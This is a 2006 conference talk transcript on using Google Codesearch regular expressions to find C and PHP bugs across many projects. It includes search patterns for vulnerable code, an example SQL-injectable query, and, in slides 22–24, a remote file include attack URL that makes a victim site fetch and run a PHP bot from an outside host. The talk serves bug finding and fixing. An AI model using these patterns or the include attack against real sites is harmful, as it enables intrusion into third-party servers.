hola a todos, buenas y gracias. hello everyone, i hope all of you are
having a good day, and thank you for coming. my name is jose nazario and
i'll be talking about google codesearch.

the talk will be in English, and i'll take questions and your comments
in #qc.

you can find the slides on my website at
http://monkey.org/~jose/presentations/umeet06/slides/ ...

[slide 1] today's talk is intended to introduce you to google codesearch
and ways that you can use it to find all sorts of programming bugs in
dozens of software applications at once. i'll provide you with a one or
two slide introduction to google codesearch.

also, since i promised google tricks (plural), i'll give you guys one
more that i don't see used often: the dot operator. i found this
accidentally when i was looking for an RPM package once. i found that
"package.rpm" brought up "package, rpm" also. turns out that google
seems to drop punctuation from the index and from your search terms, and
replaces it with the generic "stuff we don't index" filler. so, you can
now join your words in a phrase with the dot and match all sorts of
combinations. compare searching for "foo bar" against "foo.bar" (with
the first still quoted). the quotes enforce a space, but the dot allows
you to have commas or other non-word stuff in there. kind of neat, and
like i said, i don't see people using this often.

[slide 2] a bit about me: i am a senior security and software engineer
at arbor networks in ann arbor, michigan (USA). that basically means i
write software, develop new products and features, and analyze security
incidents, vulnerabilities, and tools all in my job.

i am not employed by google and i do not represent them. keep this in
mind when you're watching this talk. this is not an official google
talk.

the slides are on my website at
http://monkey.org/~jose/presentations/umeet06/slides/

[slide 3] ok, google codesearch. as i recall it was launched by google's
"labs" division (where new products come from) in early Octobers, 2006,
so just a couple of months ago. codesearch is different than google's
normal search in that it focuses on searching source code on the web.
this includes C, PHP, C++, Java, and of course scripting languages like
python, ruby, and perl. like google, it supports search operators, which
let you control the search inputs. unlike google's basic search,
however, it supports regular expressions. this means we can really dig
into code flexibly. before, if you wanted to search on google for some
source code you had to use the terms and "lang:c" in your input. now,
google codesearch lets you apply patterns to find things more flexibly.

in a nutshell, google's indexed millions of source code files. they've
downloaded it so you don't have to! great if you have ever been curious
about searching for bugs in code, like we'll be doing. far easier than
downloading thousands of source packages, storing them, and grepping
through them.

google codesearch isn't the first code search engine. koders.com has
been around for a while and they have a neat engine. it doesn't appear
to support regular expressions, but it does have many other neat
features. i recently used koders.com to find some BSD licensed code to
include in a tool that i ported from BSD to Linux. these search engines
are great for that sort of thing.

[slide 4] ok, it's a beta of a google product so it'll have some bugs,
that's to be expected. it tends to forget that you want a case sensitive
search once you crawl past the first page, for example. also, it's
regular expression engine is only applying the terms to a single line at
a time, so you can't make use of back references (a power regex facility
that let you build up complex queries on the fly). also, google
codesearch doesn't always know what the newest source archive is, so
sometimes you'll find a great bug and it will have been fixed in a a
newer version.

all in all, though, not a bad tool to have at your disposal, as you'll
see.

the slides are on my website at
http://monkey.org/~jose/presentations/umeet06/slides/

[slide 5] OK, so basics about regular expressions in case you haven't
seen or used them before. regexes are basically a way of expressing text
patterns to match specific characters or ranges of characters. for
example, to match any character you can use the . characters; the *
means 0 or more characters, and + means one or more of the preceded
characters. these can be mixed and matched, of course, such as .+ to
mean one or more characters. to specify a range, use [x-y] to denote a
range of characters, such as [A-Za-z] to match all alphabetical
characters.

if you wanted to negate something, use the [^x] character. sadly, this
only works on a single character at a time, so [^a-z] wont work. :-/ you
have to escape characters that have special meaning, like (, ) and .
using the backslash: \. to match a ., or \( to match a (.

see the URL in the page to learn more about regex formats. they're not
that hard to learn, but very complex ones require some practice. because
they're used in so many things in UN*X-land, you should become familiar
with them.

[slide 6] just like normal google searches, you can use special
operators to restrict your search. you can focus on the C language, for
example, using "lang:c" in your search. you can also negate these, or
chain them together:

        foobar lang:(c|c++) -lang:php

you can also restrict by license, using the license: operator. ie to get
only GPL files, use license:gpl. google codesearch infers the license
from various files in the source repository.

you can, of course, restrict by filename or by package, using the
operators file: and package:. this basically applies these arguments to
the result set. for example, to match only C header files, using
file:\.h$ (anything ending in .h). you may want o focus on a particular
package, focusing on only a website or a file format, using the package
operator. this one is a lot like "inurl" in a standard google query.

we'll be using some of these these operators in our searches to keep our
results focused.

[slide 7] the slides are on my website at
http://monkey.org/~jose/presentations/umeet06/slides/

a couple of facts about google codesearch, one known and one  not so
well known. if your result set has more than one hit, you can use "n" to
browse to the next result (kind of like "n" in a vi search). very handy!
google codesearch highlights the results for you, also very nice.

secondly, google codesearch seems to include some non-software archives
in its index. i found this by accident while searching for my name!
basically, what i found was someone's Linux home directory backup.
because they had some example code on a website that i wrote in their
mozilla cache, google marked it a sa code archive to include. voila, i
found their backup. quite interesting, to say the least. i'm sure other
interesting backups are out there, too.

[slide 8] screen shot showing my results that found a backup in google
codesearch. this is a backup of someone's home directory. my name
appeared in their mozilla cache.

[slide 9] in a nutshell, this is our strategy for finding bugs. it's
based on the basic openbsd philosophy: find a bug, fix it, generalize
the form, find it everywhere, fix it everywhere. for example, when you
find a typo, it's usually not the only one of its kind. fix it, find the
others, and fix them.

what we're going to do here is to to identify a bug or some bad
programming practice, and generalize that form into a regular
expression. we'll then apply that regular expression to google
codesearch and then examine the results.

i've found that a well formed regular expression yields about 10% or
more in bugs from the search results.

what you should do when you apply this is to ensure that the bug still
exists in the latest version of the code. i often have to visit the
project website, look for the latest released version and possibly the
source repository (SVN or CVS) and see if it's still there. if it is, i
think generate a patch and file a bug. i did this in October for a
variety of projects, including OpenAFS, MPlayer, MySQL, and many others.
i got a bunch of bugs fixed over a single cup of coffee, that's how easy
this can be.

[slide 10] the slides are on my website at
http://monkey.org/~jose/presentations/umeet06/slides/

i'll show you four basic bugs here and how we find them in google
codesearch. you'll learn the regular expressions for some common C logic
bugs (at least two of which have real security bug implications), some C
string handling bugs, and two types of common PHP bugs: SQL injection
and file include bugs.

[slide 11] the first set of bugs we'll find in google codesearch are
some logic bugs. specifically, there's a logic bug in C that people
encounter when they make the typo of "&" vs "&&". & is a bitwise AND,
and && is a logical AND. specifically, you use "&" to test for the
presence of a bit in a variable, and "&&" to test that two conditions
are two (a logical AND).

very often you'll see people building up a set of flags in an integer,
mixing the flags together in a variable "flags". they'll then use
logical ANDs to look for specific flags being set, such as FLAG_PROCESS
or FLAG_OLD_INPUT. the test is
    if (flags & FLAG_MINE) { /* do some stuff */ }
the complement of that is to look for two things being true, such as
this:
    if (is_set && process) { /* do more stuff */ }
only if "is_set" and "process" are not 0 or not NULL will that be true.

a common typo to make is to see && when someone meant &.

this is also present in the bitwise vs logical OR ("|" vs "||") and in
the comparison vs assignment operators ("==" vs "=").

[slide 12] ok, this is what we'll search for:
    flags\ *&&\ *[A-Za-z_]*
this will look for the line where someone has "flags" (a common variable
name) and a logical AND of a variable in upper case letters (usually
used for a macro). this is a common typo in C code. what's funny is that
the compiler treats this as reasonable code, so you wont get a warning
for it! however, if "flags" is not 0 or NULL and the macro is defines as
not 0 or NULL, this condition will always be true. this is bad,
obviously, and not what the programmer intended.

so, let's search google codesearch for this ...

[slide 13] here is an example bug in neon, found and fixed by one of our
interns. the blue highlights the for, and we can infer what the
programmer meant by reading the code. what they meant to do was to see
if the session protocol flags has the AUTH_FLAG_VERIFY_NON40x bit set,
but in this case that part of the test will always evaluate to true. if
the other parts of the condition are true, then we'll see a mistaken
"verify" part get hit.

neon fixed this bug after jon (our intern) filed a report. this bug
prevents the neon DAV component from evaluating the session properly. it
doesn't turn up often, but it is a real bug.

a coworker, aaron campbell, found a doozy of a bug in openssl
certificate checking this way. he filed a bug report and got it fixed in
under an hour. i found several bugs in MySQL, Mplayer, OpenAFS and other
projects like this, and even wound up finding a security bug in OS X
using this expression.

[slide 14] let's look for an old school C bug. this was common about 10
years ago and has been whittled away quickly, but you'll still find it
from time to time. basically what we'll be looking for is the programmer
copying user-supplied into into a buffer without any sanity or length
checking. in this case, we'll look for someone using strcat() (string
concatenation or joining) from a user supplied argument (argv[x]). this
is possibly a reliability bug, and even a security bug in some cases.
this isn't so common anymore, because it's so easy to find, yet people
still do it.

[slide 15] so, this is what we'll search for:
    strcat\ *\(\ *.*\ *,\ *argv lang:c
this looks for strcat followed by 0 or more spaces, then an open
parentheses, then any characters, then a comma, and then argv (with
optional spaces, "\ *", in there). oh, and we'll restrict ourselves to
the C language.

the problem here is that the destination buffer may not be large enough
to hold the user-supplied input. in fact, strcat() and strcpy() don't do
any length checking, they happily shove all the data from the source
into the dest and if it overflows, so be it. however, the user can craft
the input and commit a basic buffer overflow.

[slide 16] ok, it's 2006, and not surprisingly these are uncommon now.
thankfully, too! this is a bug i foun while searching for this, we can
see that the buffer "command" gets built as a 10240 byte (10k) buffer,
and for every argument supplied, the command is grown by the next
argument and a space. we may be able to overflow this, i'm not sure the
shell would allow it, but you get the idea. here we have two idioms
mixed that are dangerous: a user-controlled loop (argc controls how many
times it executes) and user supplied input going into a static buffer
unchecked (strcpy() from argv).

bad code, and revealed by google codesearch.

[slide 17] the slides are on my website at
http://monkey.org/~jose/presentations/umeet06/slides/

here are some other basic C bugs you can look for. you can generalize
the argc controlled loop pretry easily by looking for while loops and for
loops including argc. other bug classes you can easily look for are
format string bugs, looking for unformatted arguments to common
functions like printf(), syslog() and the like.

you can also look for overflows in the sprintf() and related functions.
again, look for a user-controlled input.

here, because google codesearch isn't allowing for backrefs, you have to
weed these out manually. it's pretty tough to do, and =these sorts of
bugs are not very common anymore, either. with backrefs, we could easily
"taint" user supplied variable data and follow it through the code.

[slide 18] so, let's move on to the first of two sets of PHP bug
classes. the first is SQL injection attacks and vulnerabilities. SQL
injection bugs are very common and easily created. basically, they come
from scenarios where developers build up SQL commands using unescaped,
unscrubbed user-supplied input.

there's a link here to show you how to exploit SQL injection bugs. i
wont get into that here, but suffice it to say it's trivial.

[slide 19] so, this is what we'll search for:
    SELECT\ *[^%]\ *$_GET lang:php
this looks for SELECT being followed by a GET parameter reference
without any formatting going on. there's no escaping in many of these
cases, as well.

the results? about 2000 hits on google codesearch. now that's a lot of
bugs!

[slide 20] here's an example, and (so it would fit on the screen) this
one isn't all that high profile. (some of the other projects that had
this are blogging software, CMS software, etc, all sorts of web apps).
here the query string is built from a raw, unprocessed user-supplied
variable:
    $query = "SELECT * FROM item WHERE ID == '" . $_GET['id'] ."'";
"query" references "id" from the user without any stripping of special
SQL characters. there's nothing stopping you from closing that query and
creating a new one (ie to call out stored procedures to get shell
access), or modifying it to show all items (ie where id = 1 OR id > 0).

this is the basic form of an SQL injection bug, and easy to avoid. lots
of PHP books show you how to avoid this, and this is sadly too common in
PHP code.

[slide 21] while i showed you SELECT for a GET parameter, you will also
want to look for other SQL commands: INSERT, UPDATE, DELETE, and you'll
also want to look for this in POST variables, too (ie $_POST['id']).

when you expand this out, lots more bugs, all very similar, appear. :)

the slides are on my website at
http://monkey.org/~jose/presentations/umeet06/slides/

[slide 22] the second type of PHP bug class here is due to remote file
includes. PHP has the "include()" directive which lets you include a
local file. however, PHP also lets you include remote files from another
web server.

here the exploit is to grab a malicious PHP file off of a website you
control. the exploit then has the argument to the variable include a
URL. i recently found a bot that can be used in these attacks, called
"pBot". it is designed to be included in PHP remote file include attacks
and works quite well.

[slide 23] so, what should you search for? just like before, look for
the function using an unscrubbed argument:
    include\ *\(\ *\$_GET lang:php
this looks for the PHP include function with an argument from the GET
parameter, and only in PHP files. very straight forward, here the
attacker can control the input directly.

[slide 24] some real results found in google codesearch: include calls
out to "page", a user supplied variable, and appends .php. what's the
attack look like?

suppose i have a malicious website and a malicious PHP file, like pBot
:). i store it as
    http://monkey.org/~jose/php/pBot.php
so, i attack an installation of this software like this:
    http://victim.com/admin.php?file=http://monkey.org/~jose/php/pBot
the application, and the web server, will now include and run my PHP
code. voila, a simple attack, and we found this in google codesearch.

[slide 25] i showed you how to use the GET variable, and you should also
look for PHP using untrustworthy input from cookies, POST variables, and
anything else the user can supply, such as hostnames. also, you can find
cross site scripting bugs this way, too, also looking for user-supplied
input being used without any treatment.

the PHP docs have excellent discussions on secure programming idioms, by
the way, so if you code in PHP, make sure you follow those!

[slide 26] ok, so i showed you four basic bug classes and how to find
them in google codesearch. there are some obvious limits to using google
codesearch for your code audits.

first, you still have to read the code. you still have to follow the
logic and see if it's a real bug, and you still have to understand the
code and any implications it has.

you still have to make sure it's the latest version of the code before
you fire off a bug report.

you have to tune your regular expressions to keep the false positives
down. compare searches for "strcat" vs strcat\ *\(\ *.*\ *,\ *argv. the
former will find lots of basic libc definitions of strcat, the later
will find real uses of it.

google codesearch is basically grep on steroids (in terms of speed and
quantity of input, but it is missing backrefs), and it will only find
single line bugs. you wont find many of the truly clever bugs this way.

however, i found at least two security bugs like this in just one
morning, over one cup of coffee: one is OS X (CVE-2006-4410) and one in
another project i wont name here because the bug (and security hole) are
still active. coworkers aaron and jon found two more security bugs in a
matter of minutes.

[slide 27] to sum it up, google codesearch is pretty nifty, and a lot
easier than trying to download all sorts of code and screening it
locally. believe me, i've done that!

however, it doesn't support the google web service API yet, and it
doesn't appear to be included in any IDE tools yet (like Koders is). i
imagine this will happen in time.

[slide 28] some more links for you to read. the first is from a
coworker, aaron, and he gives some searches you can look at and explains
how they work, and the bugs they yield. a very great post! aaron's an
awesome hacker and a great coworker at arbor.

the second two are posts by me discussing codesearch and giving some
basic insecurity statistics using it.

the fourth is a post from the securiteam blog giving more searches and
their results. lots more fun luring in google codesearch, that's for
sure.

[slide 29] finally, again, this was all started by a morning IRC
conversation with my arbor colleague aaron campbell. we wasted a good
morning futzing around, finding bugs, and aaron found a nifty openssl
0.9.8 bug in a matter of minutes. make sure you read his blog posting.

thank you all for your time and attention, i hope you have found this to
be fun and interesting.